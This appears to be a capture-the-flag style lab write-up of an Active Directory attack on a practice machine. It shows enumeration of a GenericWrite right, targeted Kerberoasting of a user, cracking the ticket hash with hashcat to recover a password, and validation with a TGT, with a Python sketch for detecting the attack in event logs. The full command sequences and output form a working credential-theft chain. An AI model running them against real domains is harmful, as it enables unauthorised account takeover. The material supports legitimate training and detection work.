GenericWrite
During the BloodHound enumeration, it was identified that the hrapp-service account has GenericWrite access over the hazel.green user.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hrapp-service@dc.hokkaido-aerospace.com.ccache bloodyAD -d HOKKAIDO-AEROSPACE.COM -k --host dc.hokkaido-aerospace.com get writable
distinguishedName: CN=Hazel Green,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
permission: WRITE
[...REDACTED...]
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hrapp-service@dc.hokkaido-aerospace.com.ccache powerview HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity hazel.green -SecurityIdentifier hrapp-service'
Logging directory is set to /home/kali/.powerview/logs/hokkaido-aerospace-dc.hokkaido-aerospace.com
[2025-04-25 17:56:12] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ObjectDN : CN=Hazel Green,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1106
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : ReadControl,WriteProperties,ReadProperties,Self,ListChildObjects
AccessMask : ReadControl,WriteProperties,ReadProperties,Self,ListChildObjects
InheritanceType : None
SecurityIdentifier : HOKKAIDO-AEROSPACE\hrapp-service
This is confirmed by the bloodyAD and PowerView output above.
When GenericWrite access is granted over a user object, targeted Kerberoasting can be leveraged.
Targeted Kerberoasting
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hrapp-service@dc.hokkaido-aerospace.com.ccache impacket-targetedKerberoast -d HOKKAIDO-AEROSPACE.COM --dc-host dc.hokkaido-aerospace.com --no-pass -k --use-ldaps --dc-ip $IP --request-user hazel.green
[*] Starting kerberoast attacks
[*] Attacking user (hazel.green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$HOKKAIDO-AEROSPACE.COM/Hazel.Green*$dd2af4dc3b1c12fe798065baadd18881$[...]
Using the TGT of the hrapp-service account, targeted Kerberoasting is conducted against the hazel.green user with targetedKerberoast.py.
The TGS-REP hash is returned.
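From the detection side, targetedKerberoast.py works by writing a temporary servicePrincipalName onto the target user, requesting the service ticket, and then removing the SPN again. The following Python sketch is an added example, not part of the original write-up: it correlates an SPN write (event 5136) with an RC4 service-ticket request (event 4769) for the same account. The event records, their field names, the svc-sql account, the five-minute window and the DN lookup table are all constructed assumptions, and 5136 is only logged when directory-service change auditing is enabled.

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17                  # etype 23, the type hashcat mode 13100 cracks
WINDOW = timedelta(minutes=5)    # assumed correlation window

# Constructed, pre-normalised events (field names are this example's own).
# 5136 = directory object modified, 4769 = Kerberos service ticket requested.
HAZEL_DN = "CN=Hazel Green,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com"
SQL_DN = "CN=svc-sql,OU=it,DC=hokkaido-aerospace,DC=com"   # hypothetical account
EVENTS = [
    {"id": 5136, "time": "2025-04-25T18:00:01", "actor": "hrapp-service",
     "dn": HAZEL_DN, "attr": "servicePrincipalName", "op": "add"},
    {"id": 4769, "time": "2025-04-25T18:00:02", "client": "hrapp-service",
     "service": "Hazel.Green", "etype": 0x17},
    {"id": 5136, "time": "2025-04-25T18:00:03", "actor": "hrapp-service",
     "dn": HAZEL_DN, "attr": "servicePrincipalName", "op": "delete"},
    # Benign: an admin registers an SPN and the service is used with AES.
    {"id": 5136, "time": "2025-04-25T09:00:00", "actor": "admin",
     "dn": SQL_DN, "attr": "servicePrincipalName", "op": "add"},
    {"id": 4769, "time": "2025-04-25T09:01:00", "client": "alice",
     "service": "svc-sql", "etype": 0x12},
]
# Assumed DN -> sAMAccountName lookup, normally resolved from the directory.
DN_TO_SAM = {HAZEL_DN: "hazel.green", SQL_DN: "svc-sql"}

def is_spn_write(e, op):
    return (e["id"] == 5136 and e["op"] == op
            and e["attr"].lower() == "serviceprincipalname")

def find_targeted_kerberoast(events, dn_to_sam, window=WINDOW):
    """Flag SPN adds followed within `window` by an RC4 ticket for that account."""
    evs = sorted(({**e, "time": datetime.fromisoformat(e["time"])}
                  for e in events), key=lambda e: e["time"])
    findings = []
    for w in (e for e in evs if is_spn_write(e, "add")):
        sam = dn_to_sam.get(w["dn"], "").lower()
        near = [e for e in evs if w["time"] <= e["time"] <= w["time"] + window]
        roast = [e for e in near if e["id"] == 4769 and e["etype"] == RC4_HMAC
                 and e["service"].lower() == sam]
        if roast:
            findings.append({
                "target": sam, "writer": w["actor"],
                "requester": roast[0]["client"],
                "spn_removed": any(is_spn_write(e, "delete")
                                   and e["dn"] == w["dn"] for e in near)})
    return findings

if __name__ == "__main__":
    print(find_targeted_kerberoast(EVENTS, DN_TO_SAM))
```

A finding with spn_removed set to True is the strongest signal, since a legitimate SPN registration is rarely undone within seconds.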
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ hashcat -a 0 -m 13100 hazel.green.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$HOKKAIDO-AEROSPACE.COM/Hazel.Green*$dd2af4dc3b1c12fe798065baadd18881$[...]:haze1988
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$HOK...90d7db
Time.Started.....: Fri Apr 25 18:02:11 2025 (2 secs)
Time.Estimated...: Fri Apr 25 18:02:13 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3693.5 kH/s (1.95ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7667712/14344385 (53.45%)
Rejected.........: 0/7667712 (0.00%)
Restore.Point....: 7655424/14344385 (53.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: hcwarmia7 -> havitaytay
Hardware.Mon.#1..: Util: 47%
Started: Fri Apr 25 18:02:10 2025
Stopped: Fri Apr 25 18:02:15 2025
The TGS-REP hash is cracked: haze1988
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/hazel.green@dc.hokkaido-aerospace.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: haze1988
[*] Saving ticket in hazel.green@dc.hokkaido-aerospace.com.ccache
Validated
TGT generated for the hazel.green user